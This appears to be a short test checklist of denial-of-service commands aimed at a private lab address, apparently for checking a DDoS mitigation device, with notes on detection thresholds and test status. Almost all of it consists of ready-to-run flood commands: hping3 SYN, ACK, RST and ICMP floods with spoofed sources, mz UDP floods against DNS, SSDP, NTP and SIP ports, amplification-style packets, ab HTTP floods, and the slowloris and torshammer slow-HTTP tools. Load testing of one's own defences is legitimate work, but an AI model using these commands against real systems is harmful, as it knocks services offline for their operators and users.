Example Network Attacks

Following are some example TCP/UDP Attack we can do from a Linux system for testing purposes.

TCP SYN and FIN
hping3 10.247.225.134 -a 60.1.1.1 -p 80 -SF -i u1000 (ip anomaly check) Done.

TCP ACK and RST Floods (ACK)

hping3 10.247.225.134 -a 60.1.1.2 -s 10005 -p 80 -P -A -k -i u1000 -d 60 (out-of-seq ñ over 30 packets per conn)

sudo hping3 10.247.225.134 -s 10005 -p 80 -P -A -k -i u10 -d 60

TCP ACK and RST Floods (RST)

hping3 10.247.225.134 -s 10009 -p 80 -R -i u10 (SYN Authentication ñ sent bad ack to client)

UDP Floods (NTP, DNS, SSDP) (DNS)

sudo mz -c 100000000 -B 10.247.225.134 -A rand -t dns “sp=10000,dp=53,q=www.aaa.com” -d 10u (DNS auth)
sudo mz -c 100000000 -B 10.247.225.134 -A rand -t udp “sp=10000,dp=53,p=aa:aa:aa:aa:aa:aa:aa” -d 10u (Malformed DNS)

UDP Floods (NTP, DNS, SSDP) (SSDP)

sudo mz -c 100000000 -B 10.247.225.134 -A rand -t udp “sp=10000,dp=1900,p=aa:aa:aa:aa:aa:aa:aa” -d 10u (udp auth)

UDP Floods (NTP, DNS, SSDP) (NTP)

mz -c 100000000 -B 10.247.225.134 -A rand -t udp “sp=10000,dp=123,p=aa:aa:aa:aa:aa:aa:aa” -d 10u (udp auth)

ICMP Floods

hping3 10.247.225.134 –icmp -C 3 -i u1000 –rand-source (ICMP type 3 -> drop)
done

HTTP GET/POST Flood

ab -n 10000000 -c 10 -r http://10.247.225.134:81/ (HTTP Auth ñ 302 redirect) – Need Investigation

DNS torture (DNS sub-domain)

sudo dnsperf -d dnsfile -s 10.247.225.134 -l 100 -Q 1000 -a 10.10.10.12 -v (DNS label length (suffix=2) >= 8 -> drop)
done – Script Issue

DNS/NTP amplification (DNS)

sudo hping3 10.247.225.134 -a 60.1.1.10 –udp -d 1470 -p 2000 -s 53 –keep -i u10 (udp maximum size = 1400)

DNS/NTP amplification (NTP)

hping3 10.247.225.134 -a 60.1.1.11 –udp -d 1470 -p 2000 -s 123 –keep -i u1000 (udp maximum size = 1400)

SIP Floods (Malformed SIP)

sudo mz -c 100000000 -B 10.247.225.134 -A 40.1.1.2 -t udp “sp=10000,dp=5061,p=aa:aa:aa:aa:aa:aa:aa” -d 1000u (Malformed SIP)

Slowris
./slowloris.pl -dns 10.247.225.134 -timeout 10 -num 2000 (HTTP header timeout = 5 -> Reset)

Slow Post
sudo ./torshammer.py -t 10.247.225.134 -r 100 (Post packet size <= 150 bytes , Number Packets >= 10)

Sockstress
sudo ab -n 100000 -c 500 -r http://10.247.225.134/ (current connections rate limit by source > 500 -> drop)